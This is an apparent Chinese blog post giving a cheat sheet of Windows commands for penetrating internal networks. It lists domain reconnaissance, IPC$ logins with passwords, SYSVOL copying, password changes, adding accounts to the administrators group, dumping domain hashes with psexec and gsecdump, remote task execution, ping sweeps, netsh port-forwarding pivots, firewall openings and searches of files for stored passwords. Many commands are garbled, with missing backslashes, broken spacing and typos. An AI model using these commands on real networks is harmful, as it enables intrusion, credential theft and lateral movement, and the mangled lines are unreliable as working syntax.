• 内网渗透命令大全


    1.域常用操作命令

    net  group  /domain

    //获得所有域用户组列表

    net  group  qq_group /domain

    //显示域中 qq_group 组的成员

    net  group  qq_group /del  /domain

    //删除域中 qq_group 组

    net  group  qq_group qq  /del  /domain

    //删除域内 qq_group 群组中的成员 QQ

    net  group  qq_group /add  /domain

    //增加域中的群组

    net  group  "domain admins" /domain

    //获得域管理员列表

    net  group  "enterprise admins" /domain

    //获得企业管理员列表

     

    net  localgroup administrators /domain

    //获取域内置 administrators 组用(enterprise        admins、 domain       admins)

    net  group  "domain controllers" /domain

    //获得域控制器列表

    net  group  "domain computers" /domain

    //获得所有域成员计算机列表

    net  user  /domain

    //获得所有域用户列表

    net  user  someuser /domain

    //获得指定账户 someuser 的详细信息

    net  accounts /domain

    //获得域密码策略设置,密码长短,错误锁定等信息

    nei  view  /domain

    //查询有几个域, 查询域列表

    net  view  /domain:testdomain

    //查看  testdomain 域中的计算机列表

    nltest /domain_trusts

    //获取域信任信息

     

    net  user  domain-admin /domain

    //查看管理员登陆时间,密码过期时间,是否有登陆脚本, 组分配等信息

    net  config Workstation

    //查询机器属于哪个域

    net  time  /domian

    //查询主域服务器的时间

    echo  %logonserver%

    //查看登陆到这台服务器的计算机名

    net  time   \192.168.1.1

    //查询远程共享主机 192.168.1.1 的时间

    net  use  \IPipc$ password     /user:userna me@domain

     

    //ipc$域内连接

    net   view   \dc2.backlion.com

    //查看域控共享情况

    dir   \dc2.backlion.comSYSVOL   /s  / a  >  sysvol.txt

     

    //列出 sysvol 日志记录

    xcopy \dc2.backlion.comsysvol.txt      sysvo l.txt                 /i      /e     /c

     

    //远程拷贝到本地 sysvol 日志

    net  user   /domain   bk  bk123

    //修改域内用户密码,需要管理员权限

    net   localgroup   administartors      SE ZKLacklion      /add

    //将 SEZKL 域中的用户 backlion 添加到 administrators 组中

    mstsc /admin

    //远程桌面登录到 console 会话解决 hash 无法抓出问题

    gpupdate/force

    //更新域策略

    psexec \192.168.1.3 -u  administrator - p  bk1234 -c  gsecdump.exe -u

    //从域服务器密码存储文件 windows/ntds/ntds.dit 导出 h ash 值出来

     

    gsecdump   -a

    //获取域登管理员登录过得 hash 值,这里 gescdump 为第 三方导出 AD 域的 hash 值

    tasklist /S  ip  /U  domainusername / P  /V

     

    //查看远程计算机进程列

    2.基本内网渗透命令

    ipconfig/all

    //查看 IP 地址

    ipconfig /release

    //释放地址

    ipconfig /renew

    重新获取 Ip 地址

    whoami

    //查询账号所属权限

    whoami/all

    //查看 sid 值

    systeminfo

    //查询系统以及补丁信息

    tasklist /svc

    //查看进程

    taskkill /im  进程名称(cmd)

    //结束进程

    taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)

    wmic  qfe    get  hotfixid

    //查看已安装过得补丁,这个很实用

    wmic  qfe  list  full  /format:htable >  h otfixes.htm

     

    //详细的补丁安装

    wmic   qfe

    //查询补丁信息以及微软提供的下载地址

    ping  hostname(主机名)

    //显示该机器名的 IP

    net  start

    //查看当前运行的服务

    net  user

    //查看本地组的用户

    net  localhroup administrators

    //查看本机管理员组有哪些用户

    net  user

    //查看会话

    net  session

    //查看当前会话

    net  share

    //查看 SMB 指向的路径[即共享]

    wmic  share  get  name,path

    //查看 SMB 指向的路径

    wmic  nteventlog get      path,filename,writea ble

     

    //查询系统日志文件存储位置

    net  use  \IPipc$   password     /user:us ername

     

    //建立 IPC 会话(工作组模式)

    net  use   z:    \192.168.1.1

    //建立映射到本机 Z 盘

    net  time  \172.16.16.2

    //查询共享主机的是

    at  \172.16.16.2 13:50    c:windows2009.e xe

     

    //在共享主机上执行

    netstat   -ano

    //查看开放的端口

    netstat -an  |  find  “3389”

    //找到 3389 端口

    net  accounts

    //查看本地密码策略

    nbtstat –A  ip

    //netbiso 查询

     

    net  view

    //查看机器注释或许能得到当前活动状态的机器列 禁用 netbios 就查看不出来

    echo  %PROCESSOR_ARCHITECTURE%

    //查看系统是 32 还是 64 位

    set

    //查看系统环境设置变量

    net  start

    //查看当前运行的服务

    wmic  service list  brief

    //查看进程服务

    3.内网网络结常用命令

    tracert IP

    //路由跟踪

    route  print

    //打印路由表

    arp  -a

    //列出本网段内所有活跃的 IP 地址

    arp  -s  (ip  +  mac)

    //绑定 mac 与 ip 地址

    arp  -d  (ip  +  mac)

    //解绑 mac 与 ip 地址

    nbtscan -r  192.168.16.0/24

    //通过小工具 nbtscan 扫描整个网络

    netsh  firewall show  config

    //查看防火墙策略

    netsh  firewall show  state

    //查看防火墙策略

    for  /l  %i  in  (1,1,255) do  @ping     10.0. 0.%i    -w     1   -n    1 |     find /i"ttl"

     

    //批量扫描内网存活主机

    windows自带端口转发

     

    netsh

     

    interface

     

    ipv6  install

    //首先安装 IPV6(xp、2003 下 IPV6 必须安装,否则 发不可用!)

    netsh interface portproxy add v4tov4 l istenaddress=0.0.0.0 listenport=22connecta ddress=1.1.1.1 connectport=22

     

    //将本机 22 到 1.1.1.1 的 22

    netsh interface portproxy add v4tov4 l istenaddress=192.168.193.1listenport=22 co nnectaddress=8.8.8.8 connectport=22

    netsh interface portproxy add v4tov4 l istenaddress=192.168.193.1listenport=22 co nnectaddress=www.baidu.com connectport=22

    netsh

    interface

    portproxy show

    all

    //

    查看转发配置

    netsh  interface portproxy delete v4tov

    4  listenaddress=0.0.0.0listenport=22

     

    //删除配置

    netsh  firewall set  portopening protocol

    =tcp  port=22 name=Forwardmode=enable      sco pe=all      profile=all

     

    //添加防火墙规则,允许连接 22:

    findstr /si  password *.xml  *.ini *.txt

    //查看后缀名文件中含有 password 关键字的文件

    findstr /si  login *.xml  *.ini *.txt

    //查看后缀名文件中含有 login 关键字的文件

    copy  con  创建命令:

     

    copy  con    ftp.bat

    //创建 ftp.bat 批处理,然后输入 ifconfig 等命令 r+z 退出,并创建成功

     

    copy  con    test.vbs

    //创建 test.vbs 脚本,输入脚本后,按 ctr+z 退出 建成功

    5.dsquery的 AD 查询工具:

    dsquery user  domainroot  -limit 65535 & &  net  user  /domain

     

    //列出该域内所有用户名

    dsquery server -domain super.com |    dsg et server   -dnsname      -site

    //搜索域内所有域控制器并显示他们的 DNS 主机名 名称

    dsquery contact

    //寻找目录中的联系人

    dsquery subnet

    //列出该域内网段划分

    query  user

    //查询那些用户在线

    dsquery group  &&  net  group /domain

    //列出该域内分组

    dsquery ou

    //列出该域内组织单位

    dsquery server &&  net  time  /domain

    //列出该域内域控制器

    dsquery site  -o  rdn

    //搜索域中所有站点的名称

    dsquery group  dc=super,dc=com |more

    //搜索在 DC=SUPER,DC=COM 域中的所有组

    psloggedon.exe

    //查询那台主机和用户登录到该主机上

    netsess.exe     //192.168.1.115

    //远程主机上无需管理员权限,查询到主机名和用户

    reg  query     "HKEY_CURRENT_USERSOFTWAREMIC ROSOFTTERMINAL SERVERCLIENTDEFAULT"

     

    //获取最近 mstsc 登录的记录

    6.DOS 常用快捷命令

    mspaint

    画图工具

    calc

    计算器

    notepad

    记事本

    taskmgr

    任务管理器

    osk

    打开屏幕键盘

    gpedit.msc

    组策略

    services.msc

    本地服务

    compmgmt.msc

    计算机管理

    devmgmt.msc

    设备管理器

    winver

    查看系统版本

    magnify

    放大镜实用程序

    eventvwr

    事件查看器

    Regedit

    打开注册表

    resmon

    资源监视器

    WMIC  BIOS  get      release date

     

    查看电脑生产日期

    mstsc  -f

    远程连接(可以全屏)

     

  • 相关阅读:
    vim 乱码问题的方法参考
    Node.js的原型继承函数 util.inherits
    UML类图画法及其之间的几种关系
    repo 小结
    Js_Eval方法
    Js_数组操作
    Js_字体滚动换颜色
    Js_图片轮播
    Jq_网站顶部定时折叠广告
    Js_网站右下角悬浮视窗可关闭广告
  • 原文地址:https://www.cnblogs.com/liujunjun/p/13983712.html
Copyright © 2020-2023  润新知